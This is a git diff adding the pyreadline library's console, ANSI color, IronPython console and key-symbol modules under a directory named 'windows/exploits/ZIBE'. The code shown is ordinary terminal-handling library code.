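+                    if part == u"0": # No text attribute
+                        attr = self.defaultstate.copy()
+                        attr.bold=False
+                    elif part == u"7": # switch on reverse
+                        attr.inverse=True
+                    elif part == u"1": # switch on bold (i.e. intensify foreground color)
+                        attr.bold=True
+                    elif len(part) == 2 and u"30" <= part <= u"37": # set foreground color
+                        attr.color = trtable[int(part) - 30]
+                    elif len(part) == 2 and u"40" <= part <= u"47": # set background color
+                        attr.backgroundcolor = trtable[int(part) - 40]
+                continue
+            n += len(chunk)
+            if True:
+                res.append((attr.copy(), chunk))
+        return n,res
+
+    def parse_color(self,text, attr=None):
+        n,res=self.write_color(text, attr)
+        return n, [attr.winattr for attr, text in res]
+
+def write_color(text, attr=None):
+    a = AnsiWriter(defaultstate)
+    return a.write_color(text, attr)
+
+def write_color_old( text, attr=None):
+    u'''write text at current cursor position and interpret color escapes.
+
+    return the number of characters written.
+    '''
+    res = []
+    chunks = terminal_escape.split(text)
+    n = 0 # count the characters we actually write, omitting the escapes
+    if attr is None:#use attribute from initial console
+        attr = 15
+    for chunk in chunks:
+        m = escape_parts.match(chunk)
+        if m:
+            for part in m.group(1).split(u";"):
+                if part == u"0": # No text attribute
+                    attr = 0
+                elif part == u"7": # switch on reverse
+                    attr |= 0x4000
+                if part == u"1": # switch on bold (i.e. intensify foreground color)
+                    attr |= 0x08
+                elif len(part) == 2 and u"30" <= part <= u"37": # set foreground color
+                    part = int(part)-30
+                    # we have to mirror bits
+                    attr = (attr & ~0x07) | ((part & 0x1) << 2) | (part & 0x2) | ((part & 0x4) >> 2)
+                elif len(part) == 2 and u"40" <= part <= u"47": # set background color
+                    part = int(part) - 40
+                    # we have to mirror bits
+                    attr = (attr & ~0x70) | ((part & 0x1) << 6) | ((part & 0x2) << 4) | ((part & 0x4) << 2)
+                # ignore blink, underline and anything we don't understand
+            continue
+        n += len(chunk)
+        if chunk:
+            res.append((u"0x%x"%attr, chunk))
+    return res
+
+
+#trtable={0:"black",1:"red",2:"green",3:"yellow",4:"blue",5:"magenta",6:"cyan",7:"white"}
+
+if __name__==u"__main__x":
+    import pprint
+    pprint=pprint.pprint
+
+    s=u"\033[0;31mred\033[0;32mgreen\033[0;33myellow\033[0;34mblue\033[0;35mmagenta\033[0;36mcyan\033[0;37mwhite\033[0m"
+    pprint (write_color(s))
+    pprint (write_color_old(s))
+    s=u"\033[1;31mred\033[1;32mgreen\033[1;33myellow\033[1;34mblue\033[1;35mmagenta\033[1;36mcyan\033[1;37mwhite\033[0m"
+    pprint (write_color(s))
+    pprint (write_color_old(s))
+
+    s=u"\033[0;7;31mred\033[0;7;32mgreen\033[0;7;33myellow\033[0;7;34mblue\033[0;7;35mmagenta\033[0;7;36mcyan\033[0;7;37mwhite\033[0m"
+    pprint (write_color(s))
+    pprint (write_color_old(s))
+    s=u"\033[1;7;31mred\033[1;7;32mgreen\033[1;7;33myellow\033[1;7;34mblue\033[1;7;35mmagenta\033[1;7;36mcyan\033[1;7;37mwhite\033[0m"
+    pprint (write_color(s))
+    pprint (write_color_old(s))
+
+
+if __name__==u"__main__":
+    import console
+    import pprint
+    pprint=pprint.pprint
+
+    c=console.Console()
+    c.write_color(u"dhsjdhs")
+    c.write_color(u"\033[0;32mIn [\033[1;32m1\033[0;32m]:")
+    print
+    pprint (write_color(u"\033[0;32mIn [\033[1;32m1\033[0;32m]:"))
+
+if __name__==u"__main__x":
+    import pprint
+    pprint=pprint.pprint
+    s=u"\033[0;31mred\033[0;32mgreen\033[0;33myellow\033[0;34mblue\033[0;35mmagenta\033[0;36mcyan\033[0;37mwhite\033[0m"
+    pprint (write_color(s))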
BIN
windows/exploits/ZIBE/pyreadline/console/console.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/console/console.pyc
Normal file
Binary file not shown.
|
@ -0,0 +1,16 @@
|
|||
|
||||
FOREGROUND_BLUE = 0x0001
|
||||
FOREGROUND_GREEN = 0x0002
|
||||
FOREGROUND_RED = 0x0004
|
||||
FOREGROUND_INTENSITY = 0x0008
|
||||
BACKGROUND_BLUE = 0x0010
|
||||
BACKGROUND_GREEN = 0x0020
|
||||
BACKGROUND_RED = 0x0040
|
||||
BACKGROUND_INTENSITY = 0x0080
|
||||
COMMON_LVB_LEADING_BYTE = 0x0100
|
||||
COMMON_LVB_TRAILING_BYTE = 0x0200
|
||||
COMMON_LVB_GRID_HORIZONTAL= 0x0400
|
||||
COMMON_LVB_GRID_LVERTICAL = 0x0800
|
||||
COMMON_LVB_GRID_RVERTICAL = 0x1000
|
||||
COMMON_LVB_REVERSE_VIDEO = 0x2000
|
||||
COMMON_LVB_UNDERSCORE = 0x4000
|
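--- a/windows/exploits/ZIBE/pyreadline/console/consolebase.py
+++ b/windows/exploits/ZIBE/pyreadline/console/consolebase.py
@@ -0,0 +1,52 @@
+class baseconsole:
+    def __init__(self):
+        pass
+
+    def bell(self):
+        raise NotImplementedError
+
+    def pos(self, x=None, y=None):
+        u'''Move or query the window cursor.'''
+        raise NotImplementedError
+
+    def size(self):
+        raise NotImplementedError
+
+    def rectangle(self, rect, attr=None, fill=u' '):
+        u'''Fill Rectangle.'''
+        raise NotImplementedError
+
+    def write_scrolling(self, text, attr=None):
+        u'''write text at current cursor position while watching for scrolling.
+
+        If the window scrolls because you are at the bottom of the screen
+        buffer, all positions that you are storing will be shifted by the
+        scroll amount. For example, I remember the cursor position of the
+        prompt so that I can redraw the line but if the window scrolls,
+        the remembered position is off.
+
+        This variant of write tries to keep track of the cursor position
+        so that it will know when the screen buffer is scrolled. It
+        returns the number of lines that the buffer scrolled.
+
+        '''
+        raise NotImplementedError
+
+    def getkeypress(self):
+        u'''Return next key press event from the queue, ignoring others.'''
+        raise NotImplementedError
+
+    def write(self, text):
+        raise NotImplementedError
+
+    def page(self, attr=None, fill=' '):
+        u'''Fill the entire screen.'''
+        raise NotImplementedError
+
+    def isatty(self):
+        return True
+
+    def flush(self):
+        pass
+
+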
BIN
windows/exploits/ZIBE/pyreadline/console/event.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/console/event.pyc
Normal file
Binary file not shown.
424
windows/exploits/ZIBE/pyreadline/console/ironpython_console.py
Normal file
424
windows/exploits/ZIBE/pyreadline/console/ironpython_console.py
Normal file
|
@ -0,0 +1,424 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2003-2006 Gary Bishop.
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
u'''Cursor control and color for the .NET console.
|
||||
'''
|
||||
|
||||
#
|
||||
# Ironpython requires a patch to work do:
|
||||
#
|
||||
# In file PythonCommandLine.cs patch line:
|
||||
# class PythonCommandLine
|
||||
# {
|
||||
|
||||
# to:
|
||||
# public class PythonCommandLine
|
||||
# {
|
||||
#
|
||||
#
|
||||
#
|
||||
# primitive debug printing that won't interfere with the screen
|
||||
|
||||
import clr,sys
|
||||
clr.AddReferenceToFileAndPath(sys.executable)
|
||||
import IronPythonConsole
|
||||
|
||||
import sys
|
||||
import re
|
||||
import os
|
||||
|
||||
import System
|
||||
|
||||
from event import Event
|
||||
from pyreadline.logger import log
|
||||
|
||||
from pyreadline.keysyms import \
|
||||
make_keysym, make_keyinfo, make_KeyPress, make_KeyPress_from_keydescr
|
||||
from pyreadline.console.ansi import AnsiState
|
||||
color = System.ConsoleColor
|
||||
|
||||
ansicolor={u"0;30": color.Black,
|
||||
u"0;31": color.DarkRed,
|
||||
u"0;32": color.DarkGreen,
|
||||
u"0;33": color.DarkYellow,
|
||||
u"0;34": color.DarkBlue,
|
||||
u"0;35": color.DarkMagenta,
|
||||
u"0;36": color.DarkCyan,
|
||||
u"0;37": color.DarkGray,
|
||||
u"1;30": color.Gray,
|
||||
u"1;31": color.Red,
|
||||
u"1;32": color.Green,
|
||||
u"1;33": color.Yellow,
|
||||
u"1;34": color.Blue,
|
||||
u"1;35": color.Magenta,
|
||||
u"1;36": color.Cyan,
|
||||
u"1;37": color.White
|
||||
}
|
||||
|
||||
winattr = {u"black" : 0, u"darkgray" : 0+8,
|
||||
u"darkred" : 4, u"red" : 4+8,
|
||||
u"darkgreen" : 2, u"green" : 2+8,
|
||||
u"darkyellow" : 6, u"yellow" : 6+8,
|
||||
u"darkblue" : 1, u"blue" : 1+8,
|
||||
u"darkmagenta" : 5, u"magenta" : 5+8,
|
||||
u"darkcyan" : 3, u"cyan" : 3+8,
|
||||
u"gray" : 7, u"white" : 7+8}
|
||||
|
||||
class Console(object):
|
||||
u'''Console driver for Windows.
|
||||
|
||||
'''
|
||||
|
||||
def __init__(self, newbuffer=0):
|
||||
u'''Initialize the Console object.
|
||||
|
||||
newbuffer=1 will allocate a new buffer so the old content will be restored
|
||||
on exit.
|
||||
'''
|
||||
self.serial = 0
|
||||
self.attr = System.Console.ForegroundColor
|
||||
self.saveattr = winattr[str(System.Console.ForegroundColor).lower()]
|
||||
self.savebg = System.Console.BackgroundColor
|
||||
log(u'initial attr=%s' % self.attr)
|
||||
|
||||
def _get(self):
|
||||
top = System.Console.WindowTop
|
||||
log(u"WindowTop:%s"%top)
|
||||
return top
|
||||
|
||||
def _set(self, value):
|
||||
top = System.Console.WindowTop
|
||||
log(u"Set WindowTop:old:%s,new:%s"%(top, value))
|
||||
|
||||
WindowTop = property(_get, _set)
|
||||
del _get, _set
|
||||
|
||||
def __del__(self):
|
||||
u'''Cleanup the console when finished.'''
|
||||
# I don't think this ever gets called
|
||||
pass
|
||||
|
||||
def pos(self, x=None, y=None):
|
||||
u'''Move or query the window cursor.'''
|
||||
if x is not None:
|
||||
System.Console.CursorLeft=x
|
||||
else:
|
||||
x = System.Console.CursorLeft
|
||||
if y is not None:
|
||||
System.Console.CursorTop=y
|
||||
else:
|
||||
y = System.Console.CursorTop
|
||||
return x, y
|
||||
|
||||
def home(self):
|
||||
u'''Move to home.'''
|
||||
self.pos(0, 0)
|
||||
|
||||
# Map ANSI color escape sequences into Windows Console Attributes
|
||||
|
||||
terminal_escape = re.compile(u'(\001?\033\\[[0-9;]*m\002?)')
|
||||
escape_parts = re.compile(u'\001?\033\\[([0-9;]*)m\002?')
|
||||
|
||||
# This pattern should match all characters that change the cursor position differently
|
||||
# than a normal character.
|
||||
motion_char_re = re.compile(u'([\n\r\t\010\007])')
|
||||
|
||||
def write_scrolling(self, text, attr=None):
|
||||
u'''write text at current cursor position while watching for scrolling.
|
||||
|
||||
If the window scrolls because you are at the bottom of the screen
|
||||
buffer, all positions that you are storing will be shifted by the
|
||||
scroll amount. For example, I remember the cursor position of the
|
||||
prompt so that I can redraw the line but if the window scrolls,
|
||||
the remembered position is off.
|
||||
|
||||
This variant of write tries to keep track of the cursor position
|
||||
so that it will know when the screen buffer is scrolled. It
|
||||
returns the number of lines that the buffer scrolled.
|
||||
|
||||
'''
|
||||
x, y = self.pos()
|
||||
w, h = self.size()
|
||||
scroll = 0 # the result
|
||||
|
||||
# split the string into ordinary characters and funny characters
|
||||
chunks = self.motion_char_re.split(text)
|
||||
for chunk in chunks:
|
||||
n = self.write_color(chunk, attr)
|
||||
if len(chunk) == 1: # the funny characters will be alone
|
||||
if chunk[0] == u'\n': # newline
|
||||
x = 0
|
||||
y += 1
|
||||
elif chunk[0] == u'\r': # carriage return
|
||||
x = 0
|
||||
elif chunk[0] == u'\t': # tab
|
||||
x = 8 * (int(x / 8) + 1)
|
||||
if x > w: # newline
|
||||
x -= w
|
||||
y += 1
|
||||
elif chunk[0] == u'\007': # bell
|
||||
pass
|
||||
elif chunk[0] == u'\010':
|
||||
x -= 1
|
||||
if x < 0:
|
||||
y -= 1 # backed up 1 line
|
||||
else: # ordinary character
|
||||
x += 1
|
||||
if x == w: # wrap
|
||||
x = 0
|
||||
y += 1
|
||||
if y == h: # scroll
|
||||
scroll += 1
|
||||
y = h - 1
|
||||
else: # chunk of ordinary characters
|
||||
x += n
|
||||
l = int(x / w) # lines we advanced
|
||||
x = x % w # new x value
|
||||
y += l
|
||||
if y >= h: # scroll
|
||||
scroll += y - h + 1
|
||||
y = h - 1
|
||||
return scroll
|
||||
|
||||
trtable = {0 : color.Black, 4 : color.DarkRed, 2 : color.DarkGreen,
|
||||
6 : color.DarkYellow, 1 : color.DarkBlue, 5 : color.DarkMagenta,
|
||||
3 : color.DarkCyan, 7 : color.Gray, 8 : color.DarkGray,
|
||||
4+8 : color.Red, 2+8 : color.Green, 6+8 : color.Yellow,
|
||||
1+8 : color.Blue, 5+8 : color.Magenta,3+8 : color.Cyan,
|
||||
7+8 : color.White}
|
||||
|
||||
def write_color(self, text, attr=None):
|
||||
'''write text at current cursor position and interpret color escapes.
|
||||
|
||||
return the number of characters written.
|
||||
'''
|
||||
log(u'write_color("%s", %s)' % (text, attr))
|
||||
chunks = self.terminal_escape.split(text)
|
||||
log(u'chunks=%s' % repr(chunks))
|
||||
bg = self.savebg
|
||||
n = 0 # count the characters we actually write, omitting the escapes
|
||||
if attr is None:#use attribute from initial console
|
||||
attr = self.attr
|
||||
try:
|
||||
fg = self.trtable[(0x000f&attr)]
|
||||
bg = self.trtable[(0x00f0&attr)>>4]
|
||||
except TypeError:
|
||||
fg = attr
|
||||
|
||||
for chunk in chunks:
|
||||
m = self.escape_parts.match(chunk)
|
||||
if m:
|
||||
log(m.group(1))
|
||||
attr = ansicolor.get(m.group(1), self.attr)
|
||||
n += len(chunk)
|
||||
System.Console.ForegroundColor = fg
|
||||
System.Console.BackgroundColor = bg
|
||||
System.Console.Write(chunk)
|
||||
return n
|
||||
|
||||
def write_plain(self, text, attr=None):
|
||||
u'''write text at current cursor position.'''
|
||||
log(u'write("%s", %s)' %(text, attr))
|
||||
if attr is None:
|
||||
attr = self.attr
|
||||
n = c_int(0)
|
||||
self.SetConsoleTextAttribute(self.hout, attr)
|
||||
self.WriteConsoleA(self.hout, text, len(text), byref(n), None)
|
||||
return len(text)
|
||||
|
||||
if os.environ.has_key(u"EMACS"):
|
||||
def write_color(self, text, attr=None):
|
||||
junk = c_int(0)
|
||||
self.WriteFile(self.hout, text, len(text), byref(junk), None)
|
||||
return len(text)
|
||||
write_plain = write_color
|
||||
|
||||
# make this class look like a file object
|
||||
def write(self, text):
|
||||
log(u'write("%s")' % text)
|
||||
return self.write_color(text)
|
||||
|
||||
#write = write_scrolling
|
||||
|
||||
def isatty(self):
|
||||
return True
|
||||
|
||||
def flush(self):
|
||||
pass
|
||||
|
||||
def page(self, attr=None, fill=u' '):
|
||||
u'''Fill the entire screen.'''
|
||||
System.Console.Clear()
|
||||
|
||||
def text(self, x, y, text, attr=None):
|
||||
u'''Write text at the given position.'''
|
||||
self.pos(x, y)
|
||||
self.write_color(text, attr)
|
||||
|
||||
def clear_to_end_of_window(self):
|
||||
oldtop = self.WindowTop
|
||||
lastline = self.WindowTop+System.Console.WindowHeight
|
||||
pos = self.pos()
|
||||
w, h = self.size()
|
||||
length = w - pos[0] + min((lastline - pos[1] - 1), 5) * w - 1
|
||||
self.write_color(length * u" ")
|
||||
self.pos(*pos)
|
||||
self.WindowTop = oldtop
|
||||
|
||||
def rectangle(self, rect, attr=None, fill=u' '):
|
||||
u'''Fill Rectangle.'''
|
||||
oldtop = self.WindowTop
|
||||
oldpos = self.pos()
|
||||
#raise NotImplementedError
|
||||
x0, y0, x1, y1 = rect
|
||||
if attr is None:
|
||||
attr = self.attr
|
||||
if fill:
|
||||
rowfill = fill[:1] * abs(x1 - x0)
|
||||
else:
|
||||
rowfill = u' ' * abs(x1 - x0)
|
||||
for y in range(y0, y1):
|
||||
System.Console.SetCursorPosition(x0, y)
|
||||
self.write_color(rowfill, attr)
|
||||
self.pos(*oldpos)
|
||||
|
||||
def scroll(self, rect, dx, dy, attr=None, fill=' '):
|
||||
u'''Scroll a rectangle.'''
|
||||
raise NotImplementedError
|
||||
|
||||
def scroll_window(self, lines):
|
||||
u'''Scroll the window by the indicated number of lines.'''
|
||||
top = self.WindowTop + lines
|
||||
if top < 0:
|
||||
top = 0
|
||||
if top + System.Console.WindowHeight > System.Console.BufferHeight:
|
||||
top = System.Console.BufferHeight
|
||||
self.WindowTop = top
|
||||
|
||||
def getkeypress(self):
|
||||
u'''Return next key press event from the queue, ignoring others.'''
|
||||
ck = System.ConsoleKey
|
||||
while 1:
|
||||
e = System.Console.ReadKey(True)
|
||||
if e.Key == System.ConsoleKey.PageDown: #PageDown
|
||||
self.scroll_window(12)
|
||||
elif e.Key == System.ConsoleKey.PageUp:#PageUp
|
||||
self.scroll_window(-12)
|
||||
elif str(e.KeyChar) == u"\000":#Drop deadkeys
|
||||
log(u"Deadkey: %s"%e)
|
||||
return event(self, e)
|
||||
else:
|
||||
return event(self, e)
|
||||
|
||||
def title(self, txt=None):
|
||||
u'''Set/get title.'''
|
||||
if txt:
|
||||
System.Console.Title = txt
|
||||
else:
|
||||
return System.Console.Title
|
||||
|
||||
def size(self, width=None, height=None):
|
||||
u'''Set/get window size.'''
|
||||
sc = System.Console
|
||||
if width is not None and height is not None:
|
||||
sc.BufferWidth, sc.BufferHeight = width,height
|
||||
else:
|
||||
return sc.BufferWidth, sc.BufferHeight
|
||||
|
||||
if width is not None and height is not None:
|
||||
sc.WindowWidth, sc.WindowHeight = width,height
|
||||
else:
|
||||
return sc.WindowWidth - 1, sc.WindowHeight - 1
|
||||
|
||||
def cursor(self, visible=True, size=None):
|
||||
u'''Set cursor on or off.'''
|
||||
System.Console.CursorVisible = visible
|
||||
|
||||
def bell(self):
|
||||
System.Console.Beep()
|
||||
|
||||
def next_serial(self):
|
||||
u'''Get next event serial number.'''
|
||||
self.serial += 1
|
||||
return self.serial
|
||||
|
||||
class event(Event):
|
||||
u'''Represent events from the console.'''
|
||||
def __init__(self, console, input):
|
||||
u'''Initialize an event from the Windows input structure.'''
|
||||
self.type = u'??'
|
||||
self.serial = console.next_serial()
|
||||
self.width = 0
|
||||
self.height = 0
|
||||
self.x = 0
|
||||
self.y = 0
|
||||
self.char = str(input.KeyChar)
|
||||
self.keycode = input.Key
|
||||
self.state = input.Modifiers
|
||||
log(u"%s,%s,%s"%(input.Modifiers, input.Key, input.KeyChar))
|
||||
self.type = "KeyRelease"
|
||||
self.keysym = make_keysym(self.keycode)
|
||||
self.keyinfo = make_KeyPress(self.char, self.state, self.keycode)
|
||||
|
||||
def make_event_from_keydescr(keydescr):
|
||||
def input():
|
||||
return 1
|
||||
input.KeyChar = u"a"
|
||||
input.Key = System.ConsoleKey.A
|
||||
input.Modifiers = System.ConsoleModifiers.Shift
|
||||
input.next_serial = input
|
||||
e = event(input,input)
|
||||
del input.next_serial
|
||||
keyinfo = make_KeyPress_from_keydescr(keydescr)
|
||||
e.keyinfo = keyinfo
|
||||
return e
|
||||
|
||||
CTRL_C_EVENT=make_event_from_keydescr(u"Control-c")
|
||||
|
||||
def install_readline(hook):
|
||||
def hook_wrap():
|
||||
try:
|
||||
res = hook()
|
||||
except KeyboardInterrupt,x: #this exception does not seem to be caught
|
||||
res = u""
|
||||
except EOFError:
|
||||
return None
|
||||
if res[-1:] == u"\n":
|
||||
return res[:-1]
|
||||
else:
|
||||
return res
|
||||
class IronPythonWrapper(IronPythonConsole.IConsole):
|
||||
def ReadLine(self, autoIndentSize):
|
||||
return hook_wrap()
|
||||
def Write(self, text, style):
|
||||
System.Console.Write(text)
|
||||
def WriteLine(self, text, style):
|
||||
System.Console.WriteLine(text)
|
||||
IronPythonConsole.PythonCommandLine.MyConsole = IronPythonWrapper()
|
||||
|
||||
|
||||
|
||||
if __name__ == u'__main__':
|
||||
import time, sys
|
||||
c = Console(0)
|
||||
sys.stdout = c
|
||||
sys.stderr = c
|
||||
c.page()
|
||||
c.pos(5, 10)
|
||||
c.write(u'hi there')
|
||||
c.title(u"Testing console")
|
||||
# c.bell()
|
||||
print
|
||||
print u"size", c.size()
|
||||
print u' some printed output'
|
||||
for i in range(10):
|
||||
e = c.getkeypress()
|
||||
print e.Key, chr(e.KeyChar), ord(e.KeyChar), e.Modifiers
|
||||
del c
|
||||
|
||||
System.Console.Clear()
|
BIN
windows/exploits/ZIBE/pyreadline/error.pyc
Normal file
Binary file not shown.
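--- a/windows/exploits/ZIBE/pyreadline/get_doc.py
+++ b/windows/exploits/ZIBE/pyreadline/get_doc.py
@@ -0,0 +1,18 @@
+import sys,textwrap
+
+rlmain = sys.modules[u"pyreadline.rlmain"]
+rl = rlmain.rl
+
+def get_doc(rl):
+    methods = [(x, getattr(rl, x)) for x in dir(rl) if callable(getattr(rl, x))]
+    return [ (x, m.__doc__ )for x, m in methods if m.__doc__]
+
+
+def get_rest(rl):
+    q = get_doc(rl)
+    out = []
+    for funcname, doc in q:
+        out.append(funcname)
+        out.append(u"\n".join(textwrap.wrap(doc, 80, initial_indent=u" ")))
+        out.append(u"")
+    return out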
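--- a/windows/exploits/ZIBE/pyreadline/keysyms/__init__.py
+++ b/windows/exploits/ZIBE/pyreadline/keysyms/__init__.py
@@ -0,0 +1,20 @@
+import sys
+
+success = False
+in_ironpython = u"IronPython" in sys.version
+
+if in_ironpython:
+    try:
+        from ironpython_keysyms import *
+        success = True
+    except ImportError, x:
+        raise
+else:
+    try:
+        from keysyms import *
+        success = True
+    except ImportError, x:
+        pass
+
+if not success:
+    raise ImportError(u"Could not import keysym for local pythonversion", x)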
127
windows/exploits/ZIBE/pyreadline/keysyms/common.py
Normal file
|
@ -0,0 +1,127 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2003-2006 Gary Bishop.
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
# table for translating virtual keys to X windows key symbols
|
||||
|
||||
try:
|
||||
set
|
||||
except NameError:
|
||||
from sets import Set as set
|
||||
|
||||
from pyreadline.unicode_helper import ensure_unicode
|
||||
|
||||
validkey =set([u'cancel', u'backspace', u'tab', u'clear',
|
||||
u'return', u'shift_l', u'control_l', u'alt_l',
|
||||
u'pause', u'caps_lock', u'escape', u'space',
|
||||
u'prior', u'next', u'end', u'home',
|
||||
u'left', u'up', u'right', u'down',
|
||||
u'select', u'print', u'execute', u'snapshot',
|
||||
u'insert', u'delete', u'help', u'f1',
|
||||
u'f2', u'f3', u'f4', u'f5',
|
||||
u'f6', u'f7', u'f8', u'f9',
|
||||
u'f10', u'f11', u'f12', u'f13',
|
||||
u'f14', u'f15', u'f16', u'f17',
|
||||
u'f18', u'f19', u'f20', u'f21',
|
||||
u'f22', u'f23', u'f24', u'num_lock',
|
||||
u'scroll_lock', u'vk_apps', u'vk_processkey',u'vk_attn',
|
||||
u'vk_crsel', u'vk_exsel', u'vk_ereof', u'vk_play',
|
||||
u'vk_zoom', u'vk_noname', u'vk_pa1', u'vk_oem_clear',
|
||||
u'numpad0', u'numpad1', u'numpad2', u'numpad3',
|
||||
u'numpad4', u'numpad5', u'numpad6', u'numpad7',
|
||||
u'numpad8', u'numpad9', u'divide', u'multiply',
|
||||
u'add', u'subtract', u'vk_decimal'])
|
||||
|
||||
escape_sequence_to_special_key = {u"\\e[a" : u"up", u"\\e[b" : u"down", u"del" : u"delete"}
|
||||
|
||||
class KeyPress(object):
|
||||
def __init__(self, char=u"", shift=False, control=False, meta=False, keyname=u""):
|
||||
if control or meta or shift:
|
||||
char = char.upper()
|
||||
self.info = dict(char=char,
|
||||
shift=shift,
|
||||
control=control,
|
||||
meta=meta,
|
||||
keyname=keyname)
|
||||
|
||||
def create(name):
|
||||
def get(self):
|
||||
return self.info[name]
|
||||
|
||||
def set(self, value):
|
||||
self.info[name] = value
|
||||
return property(get, set)
|
||||
char = create(u"char")
|
||||
shift = create(u"shift")
|
||||
control = create(u"control")
|
||||
meta = create(u"meta")
|
||||
keyname = create(u"keyname")
|
||||
|
||||
def __repr__(self):
|
||||
return u"(%s,%s,%s,%s)"%tuple(map(ensure_unicode, self.tuple()))
|
||||
|
||||
def tuple(self):
|
||||
if self.keyname:
|
||||
return (self.control, self.meta, self.shift, self.keyname)
|
||||
else:
|
||||
if self.control or self.meta or self.shift:
|
||||
return (self.control, self.meta, self.shift, self.char.upper())
|
||||
else:
|
||||
return (self.control, self.meta, self.shift, self.char)
|
||||
|
||||
def __eq__(self, other):
|
||||
if isinstance(other, KeyPress):
|
||||
s = self.tuple()
|
||||
o = other.tuple()
|
||||
return s == o
|
||||
else:
|
||||
return False
|
||||
|
||||
def make_KeyPress_from_keydescr(keydescr):
|
||||
keyinfo = KeyPress()
|
||||
if len(keydescr) > 2 and keydescr[:1] == u'"' and keydescr[-1:] == u'"':
|
||||
keydescr = keydescr[1:-1]
|
||||
|
||||
while 1:
|
||||
lkeyname = keydescr.lower()
|
||||
if lkeyname.startswith(u'control-'):
|
||||
keyinfo.control = True
|
||||
keydescr = keydescr[8:]
|
||||
elif lkeyname.startswith(u'ctrl-'):
|
||||
keyinfo.control = True
|
||||
keydescr = keydescr[5:]
|
||||
elif keydescr.lower().startswith(u'\\c-'):
|
||||
keyinfo.control = True
|
||||
keydescr = keydescr[3:]
|
||||
elif keydescr.lower().startswith(u'\\m-'):
|
||||
keyinfo.meta = True
|
||||
keydescr = keydescr[3:]
|
||||
elif keydescr in escape_sequence_to_special_key:
|
||||
keydescr = escape_sequence_to_special_key[keydescr]
|
||||
elif lkeyname.startswith(u'meta-'):
|
||||
keyinfo.meta = True
|
||||
keydescr = keydescr[5:]
|
||||
elif lkeyname.startswith(u'alt-'):
|
||||
keyinfo.meta = True
|
||||
keydescr = keydescr[4:]
|
||||
elif lkeyname.startswith(u'shift-'):
|
||||
keyinfo.shift = True
|
||||
keydescr = keydescr[6:]
|
||||
else:
|
||||
if len(keydescr) > 1:
|
||||
if keydescr.strip().lower() in validkey:
|
||||
keyinfo.keyname = keydescr.strip().lower()
|
||||
keyinfo.char = ""
|
||||
else:
|
||||
raise IndexError(u"Not a valid key: '%s'"%keydescr)
|
||||
else:
|
||||
keyinfo.char = keydescr
|
||||
return keyinfo
|
||||
|
||||
if __name__ == u"__main__":
|
||||
import startup
|
||||
|
202
windows/exploits/ZIBE/pyreadline/keysyms/ironpython_keysyms.py
Normal file
|
@ -0,0 +1,202 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2003-2006 Gary Bishop.
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
import System
|
||||
from common import validkey, KeyPress, make_KeyPress_from_keydescr
|
||||
|
||||
c32 = System.ConsoleKey
|
||||
Shift = System.ConsoleModifiers.Shift
|
||||
Control = System.ConsoleModifiers.Control
|
||||
Alt = System.ConsoleModifiers.Alt
|
||||
# table for translating virtual keys to X windows key symbols
|
||||
code2sym_map = {#c32.CANCEL: u'Cancel',
|
||||
c32.Backspace: u'BackSpace',
|
||||
c32.Tab: u'Tab',
|
||||
c32.Clear: u'Clear',
|
||||
c32.Enter: u'Return',
|
||||
# c32.Shift: u'Shift_L',
|
||||
# c32.Control: u'Control_L',
|
||||
# c32.Menu: u'Alt_L',
|
||||
c32.Pause: u'Pause',
|
||||
# c32.Capital: u'Caps_Lock',
|
||||
c32.Escape: u'Escape',
|
||||
# c32.Space: u'space',
|
||||
c32.PageUp: u'Prior',
|
||||
c32.PageDown: u'Next',
|
||||
c32.End: u'End',
|
||||
c32.Home: u'Home',
|
||||
c32.LeftArrow: u'Left',
|
||||
c32.UpArrow: u'Up',
|
||||
c32.RightArrow: u'Right',
|
||||
c32.DownArrow: u'Down',
|
||||
c32.Select: u'Select',
|
||||
c32.Print: u'Print',
|
||||
c32.Execute: u'Execute',
|
||||
# c32.Snapshot: u'Snapshot',
|
||||
c32.Insert: u'Insert',
|
||||
c32.Delete: u'Delete',
|
||||
c32.Help: u'Help',
|
||||
c32.F1: u'F1',
|
||||
c32.F2: u'F2',
|
||||
c32.F3: u'F3',
|
||||
c32.F4: u'F4',
|
||||
c32.F5: u'F5',
|
||||
c32.F6: u'F6',
|
||||
c32.F7: u'F7',
|
||||
c32.F8: u'F8',
|
||||
c32.F9: u'F9',
|
||||
c32.F10: u'F10',
|
||||
c32.F11: u'F11',
|
||||
c32.F12: u'F12',
|
||||
c32.F13: u'F13',
|
||||
c32.F14: u'F14',
|
||||
c32.F15: u'F15',
|
||||
c32.F16: u'F16',
|
||||
c32.F17: u'F17',
|
||||
c32.F18: u'F18',
|
||||
c32.F19: u'F19',
|
||||
c32.F20: u'F20',
|
||||
c32.F21: u'F21',
|
||||
c32.F22: u'F22',
|
||||
c32.F23: u'F23',
|
||||
c32.F24: u'F24',
|
||||
# c32.Numlock: u'Num_Lock,',
|
||||
# c32.Scroll: u'Scroll_Lock',
|
||||
# c32.Apps: u'VK_APPS',
|
||||
# c32.ProcesskeY: u'VK_PROCESSKEY',
|
||||
# c32.Attn: u'VK_ATTN',
|
||||
# c32.Crsel: u'VK_CRSEL',
|
||||
# c32.Exsel: u'VK_EXSEL',
|
||||
# c32.Ereof: u'VK_EREOF',
|
||||
# c32.Play: u'VK_PLAY',
|
||||
# c32.Zoom: u'VK_ZOOM',
|
||||
# c32.Noname: u'VK_NONAME',
|
||||
# c32.Pa1: u'VK_PA1',
|
||||
c32.OemClear: u'VK_OEM_CLEAR',
|
||||
c32.NumPad0: u'NUMPAD0',
|
||||
c32.NumPad1: u'NUMPAD1',
|
||||
